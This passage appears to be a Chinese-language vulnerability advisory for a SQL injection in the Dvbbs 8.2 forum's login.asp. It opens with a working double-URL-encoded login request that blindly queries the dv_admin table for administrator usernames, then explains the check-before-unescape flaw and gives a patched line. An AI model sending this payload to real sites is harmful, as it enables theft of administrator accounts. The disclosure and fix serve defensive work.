password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可觸發(fā).

漏洞分析:動(dòng)網(wǎng)在asp領(lǐng)域也算一個(gè)比較元老的程序,這次在8.2新版里有一個(gè)低級(jí)的錯(cuò)誤.漏洞代碼在login.asp 118行左右

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先經(jīng)過(guò)檢查然后再unescape解碼,導(dǎo)致用urlencode模式就可以饒過(guò)任何檢查,和php的urldecode導(dǎo)致的注射很類似,譬如用%2527就可以提交'過(guò)去了.

修補(bǔ)方案:修補(bǔ)也很簡(jiǎn)單,將上述代碼改成

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username)))
......

最新評(píng)論